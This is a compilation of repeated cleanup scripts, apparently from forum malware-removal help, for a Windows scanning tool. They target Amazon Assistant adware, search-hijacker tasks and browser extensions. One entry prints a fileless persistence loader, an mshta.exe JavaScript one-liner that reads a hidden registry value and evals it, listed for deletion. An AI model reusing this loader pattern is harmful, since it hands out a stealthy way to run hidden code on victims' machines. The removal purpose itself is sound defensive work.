CreateRestorePoint:
CloseProcesses:
S2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
2017-03-18 02:43 - 2017-03-18 02:43 - 00002275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AmazonAssistant.lnk
2017-03-18 02:43 - 2017-03-18 02:43 - 00000000 ____D C:\Program Files (x86)\Amazon
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
R2 Amazon Assistant Service; C:\Program Files\Amazon\Amazon Assistant\amazonAssistantService.exe [102576 2017-02-28] ()
C:\Program Files\Amazon
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
Task: {D51E0424-3F4D-471F-B37F-497C87B45A9F} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2016-11-16] (Distromatic) <==== ATTENTION
HKU\S-1-5-21-3509451062-2650747901-1925886680-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9364696 2017-03-03] (Piriform Ltd)
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
C:\Program Files (x86)\Amazon
Task: {1BA3FEE7-AA6A-451B-9963-0F7BDD538EAE} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2016-11-16] (Distromatic) <==== ATTENTION
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
FF Extension: (Amazon Assistant for Firefox) - C:\Users\alexi\AppData\Roaming\Mozilla\Firefox\Profiles\xrsmru98.default\Extensions\abb-acer@amazon.com [2017-01-06]
S2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
C:\Program Files (x86)\Amazon
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Admin74\AppData\Roaming\Mozilla\Firefox\Profiles\5la225dr.default\Extensions\abb-acer@amazon.com [2016-09-02]
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
C:\Program Files (x86)\Amazon
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
C:\Program Files (x86)\Amazon
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
BHO: The Amazon 1Button App for Internet Explorer -> {BAC72C85-CEC6-4B86-AF06-FA20C259FAB8} -> C:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonBrowserHelper64.dll => No File
FF Extension: (Amazon Assistant for Firefox) - C:\Users\annie\AppData\Roaming\Mozilla\Firefox\Profiles\uq81yr0m.default\Extensions\abb-acer@amazon.com [2016-08-15]
S2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
C:\Program Files (x86)\Amazon
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1136776467-33283779-138301361-1001\...\Run: [**wzzamwf<*>] => "C:\Users\Guillaume Roduit\AppData\Local\a415\58c8.bat" <===== ATTENTION (Value Name with invalid characters)
C:\Users\Guillaume Roduit\AppData\Local\a41
HKU\S-1-5-21-1136776467-33283779-138301361-1001\...\Run: [Browser Extensions] => C:\Users\Guillaume Roduit\AppData\Roaming\BrowserExtensions\BEHelper.exe [1619240 2017-02-28] ()
S4 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
HKU\S-1-5-21-1136776467-33283779-138301361-1001\Software\Classes\29ad: "C:\WINDOWS\system32\mshta.exe" "javascript:Jf1PA3="d";c1u=new ActiveXObject("WScript.Shell");Y13zut="N";iNJ01g=c1u.RegRead("HKCU\\software\\mrqdam\\xkcfmx");yeAD64l="85";eval(iNJ01g);iBO4Q7m="9gHTVN8";" <===== ATTENTION
reg: reg delete "HKCU\Software\mrqdam"
C:\Program Files (x86)\Amazon
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
CHR Extension: (Search Manager) - C:\Users\Tizzeur\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce [2017-04-07]
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
Task: C:\WINDOWS\Tasks\Yahoo! Powered timol.job => Wscript.exe C:\ProgramData\{506E950D-DA2C-1FCB-5CEA-8189C6A80A47}\fire.txt <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
CreateRestorePoint:
CloseProcesses:
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
2017-03-01 22:34 - 2017-03-01 22:34 - 00002275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AmazonAssistant.lnk
2017-03-01 22:34 - 2017-03-01 22:34 - 00000000 ____D C:\Program Files (x86)\Amazon
2017-02-14 22:04 - 2017-02-14 22:05 - 04121760 _____ (Husdawg, LLC) C:\Users\Jérôme\Downloads\Detection.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot: